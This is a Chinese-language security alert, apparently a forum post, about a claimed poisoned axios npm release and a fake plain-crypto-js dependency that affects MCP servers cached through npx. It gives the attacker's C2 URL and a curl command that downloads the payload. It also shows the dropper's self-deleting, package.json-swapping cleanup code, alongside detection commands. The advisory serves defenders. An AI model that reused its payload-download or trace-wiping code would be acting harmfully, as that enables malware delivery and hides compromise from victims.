⚠️⚠️⚠️ 緊急通告⚠️⚠️⚠️
各位開發者 特別是Nodejs 使用 axios庫的時候 檢查下 axios 版本
補充一下 不僅僅是開發人員 使用了AI Cli(例如codex claude code) 並且調用了 open-websearch 等MCP的也要自查
使用 npx 安裝的 latest 版本的時候會安裝 axios@1.14.1 此版本存在供應鏈投毒
惡意包 │ plain-crypto-js@4.2.1(偽裝 crypto-js)
投毒的 axios │ axios@1.14.1(被篡改,加入了 plain-crypto-js 依賴)
受影響的 MCP │ open-websearch 和 exa-mcp-server 的 npx 緩存
惡意行為 │ 複製 PowerShell 為 wt.exe,執行遠程載荷後自刪除
攻擊行為詳解
C2 服務器 : http:/sfrclak.com:8000/6202033
三平臺全覆蓋的攻擊
Windows :
1. where powershell → 找到 powershell.exe 路徑
2. 複製 powershell.exe → C:\ProgramData\wt.exe (偽裝成 Windows Terminal)
3. 寫入 VBS 腳本到 %TEMP%\6202033.vbs:
- 用 curl 從 C2 下載載荷: curl -s -X POST -d "packages.npm.org/product1" "http:/sfrclak.com:8000/6202033"
- 保存為 .ps1 文件
- 用偽裝的 wt.exe (實際是 PowerShell) 隱窗執行: -w hidden -ep bypass
- 執行完刪除 .ps1
4. 用 cscript 靜默執行 VBS,執行完刪除 VBS
macOS:
1. curl 從 C2 下載二進制到 /Library/Caches/com.apple.act.mond (偽裝成系統進程)
2. chmod 770 賦權
3. 後臺執行,連回 C2
4. 通過 osascript (AppleScript) 執行,刪除痕跡
Linux:
1. curl 從 C2 下載 Python 腳本到 /tmp/ld.py
2. nohup 後臺執行,連回 C2
最後的毀屍滅跡
// 刪除 setup.js 自身
fs.unlink(__filename, (x=>{}));
// 把 package.md 重命名為 package.json,覆蓋掉含 postinstall 的原始 package.json
fs.rename("package.md", "package.json", (x=>{}));
連 package.json 都替換了,事後檢查依賴根本看不出 postinstall 曾經存在過。
快速排查
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"
請檢查plain-crypto-js以下內容node_modules:
ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"
如果該程序setup.js已經運行,package.json則此目錄中的內容將被替換為乾淨的存根文件。
該目錄的存在足以證明投放器已執行。
檢查受影響系統上是否存在 RAT 痕跡:
# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"
# Linux
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED":: Windows (cmd.exe)
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED
這是一個不到 24 小時前發生的 0-day 供應鏈攻擊(2026-03-31),目前 npm 和安全社區尚未公開披露。
